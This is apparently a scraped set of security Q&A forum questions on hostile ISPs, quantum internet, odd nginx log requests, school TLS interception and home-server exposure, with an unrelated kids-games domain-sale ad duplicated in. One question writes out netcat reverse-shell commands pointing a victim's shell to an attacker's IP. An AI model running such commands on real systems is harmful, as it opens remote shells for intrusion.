Securing internet connection with hostile ISP

Please excuse the lack of details, you can understand why. I have a friend in a foreign country who is certain that he is a surveillance target of his local government. Other people he knows in his same category have already had their internet connections spied on, and seen contents of their emails leaked. He refuses to use his local ISP because the government runs it, so he uses another means of internet but which is very unreliable.

He really would like to use a landline ISP for it’s stability, but knows he can’t trust it. I thought of setting him up with a serious firewall (like pfSense) with a permanent VPN tunnel to a provider that is based outside of his country.

Given these considerations, would this be a safe solution? Or rather if the ISP is compromised, are all bets off?

How could the “unhackabilty” of quantum Internet justify its cost?

The U.S. Department of Energy (DOE) seems to be very excited about the potential of a quantum Internet:

One of the hallmarks of quantum transmissions is that they are exceedingly difficult to eavesdrop on as information passes between locations. Scientists plan to use that trait to make virtually unhackable networks. Early adopters could include industries such as banking and health services, with applications for national security and aircraft communications. Eventually, the use of quantum networking technology in mobile phones could have broad impacts on the lives of individuals around the world. […] the quantum internet could become a secure communications network and have a profound impact on areas critical to science, industry, and national security.

So quantum transmissions would reveal if they were read in transit before the intended recipient, which would preclude MitM attacks. But so does TLS, and even though MitM attacks against TLS are possible, the vast majority of attacks are conducted not against data in transit, but against data at rest, OS and hardware vulnerabilities, and most commonly (between 80% and 98%, depending on which statistics you look at), via social engineering. I’ve looked at several cybersecurity stats, and the bottom line is that the vast majority of attacks are due to human error.

I’m trying to understand the excitement about the quantum Internet, and the reasons for the investments going into it.

Could quantum-secure transmissions help in any way mitigate the types of cyberattacks we’ve been seeing in the past 10 years, and which are likely to continue? "Early adopters could include industries such as banking" – how much has banking been affected by insecure Internet links (rather than hosts or persons)?

Or does the press release completely gloss over something else – that quantum computers (rather than the quantum Internet) would be able to break current public key crypotography, hence a quantum Internet would be useful to prevent those future attacks? Is that it, and a case of a vague press release, or am I neglecting something else?

In any case, I’m failing to understand how "the use of quantum networking technology in mobile phones could have broad impacts on the lives of individuals around the world". The vast majority of mobile phone users are completely oblivious to the security of their communications, and they wouldn’t behave any differently if they thought their communications were completely secure.

Setting up netcat session over the internet [closed]

I am a student working on an ethical hacking project.

How do I set a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC has an attacker machine. I tried the following commands:

Attacker’s machine running the latest Kali 2020.3 (Tried NAT VM setup and live booting too):

nc –nlvp 5555 

Victim’s machine running ubuntu 18.04.05:

/bin/sh | nc <PUBLIC IP OF ATTACKER's MACHINE> 5555 

But it just does not open a reverse shell on the attacker’s machine. Did I miss out anything?

Weird GET request on internet facing Nginx

I spun up an internet facing nginx server in AWS and the logs started showing weird get requests with a search engine’s spider as user agent.

172.31.43.193 - - [19/Aug/2020:20:09:19 +0000] "GET /rexcategory?categoryCodes=SHPCAT33&t=1360657001168 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159"  2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/eyloyrewards/category" failed (2: No such file or directory), client: 172.31.43.193, server: localhost, request: "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1", host: "www.rewards.etihadguest.com"  172.31.43.193 - - [19/Aug/2020:20:08:39 +0000] "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159" 

The domain mentioned in the second line does not belong to me. What is the meaning of these logs? Is my server being used to attack the mentioned domain, "www.rewards.etihadguest.com" ?

Kids Gaming Website, High Searches Keyword in Internet, Newbie Friendly,No experience Needed

Hello, Thank you for watching my auction. Today I am selling my new beautiful gaming site https://kidsgamesfree.net

Currently there are so many searches online for this keyword. As example the term 'kids games online' has 27.000 searches a month in google, 'kids games online for free' has 22.000 searches.

Domain name are chosen carefully so I only choose the best domain name and high value, this is Premium Domain Name ( Exact Match Keyword Domain, worth thousands) so that…

Kids Gaming Website, High Searches Keyword in Internet, Newbie Friendly,No experience Needed

Gaming Website, High Searches Keyword in Internet, Newbie Friendly,No experience Needed

Hello, Thank you for watching my auction. Today I am selling my new beautiful gaming site https://kidsgamesfree.net

Currently there are so many searches online for this keyword. As example the term 'kids games online' has 27.000 searches a month in google, 'kids games online for free' has 22.000 searches.

Domain name are chosen carefully so I only choose the best domain name and high value, this is Premium Domain Name ( Exact Match Keyword Domain, worth thousands) so that…

Gaming Website, High Searches Keyword in Internet, Newbie Friendly,No experience Needed

School requires CA certificate for internet access. Will use of VPN or proxy tunnelling prevent this? [closed]

My school uses a thing called Cyberhound. It filters websites and stuff. In order to connect to wifi, it requires students to use their given username and password. After you are connected, you must install a CA certificate provided by the school to be installed under Trusted Root Certification Authorities (on our personal devices). If not installed, every websites are blocked and prompts us to install the certificate. I did not sign nor read anything saying that they will do this.

I did some research and found out that there is a possibility that users with the certificate can intercept and decrypt any SSL/TLS connection on the local network. Is there any ways to access the internet without the certificate? I heard it is possible with VPN or proxy tunnelling through unblocked ports.

My internet domain expired because the website owner died [closed]

I purchased a domain name that I was intending to use. I paid for its renewal twice. However, I just found out that the owner of the webspace (flockhosting.com) died – cancer – and he was apparently too sick to get around to renewing.

I try now to renew the domain through someone else, but I am repeatedly told that the domain name is taken. I think Chuck originally was sending the domains to someone else for renewal.

How long will it be before the domain expires, and then can be reused? The domain is mine.

Is it safe to open a server application on the internal network to the public internet

I am a programmer but I am currently learning about web development in general. I’m creating a server on my local host using nodejs and express. It’s available on my local host but I want to test it with a domain I have, so I can access it from any device anywhere.

What I decided to do was change my router settings to direct any traffic it gets on its IP to my computers internal IP on port 3000 so anyone can access the my html pages from my local machine. This was working quite well.

But after some hours of working Bitdefender Antivirus alerted that It blocked some attacks from a specific IP on port 3000. This lead me to question how safe It was to be doing this. The server is running on my home machine that has my regular files and documents.

Of course I’m only serving the html pages for the site but can someone kindly explain the security implications of using your regular home router as a server as opposed to a dedicated server or a web hosting service.

Note 1: I’m not interested in other aspects such as bandwidth since that’s not going to be a problem.

Note 2: Also I’m using Netlify’s free web hosting right now as an alternate (or instead of the alternate) but it’s god awfully slow to load my simplest html page. It takes a while (inconsistent as well) before the browser can even resolve the domain and then loads the content progressively slowly ( I mean you see things like the main image slowly reveal). when using my own router it’s blazingly fast; not just on my local machine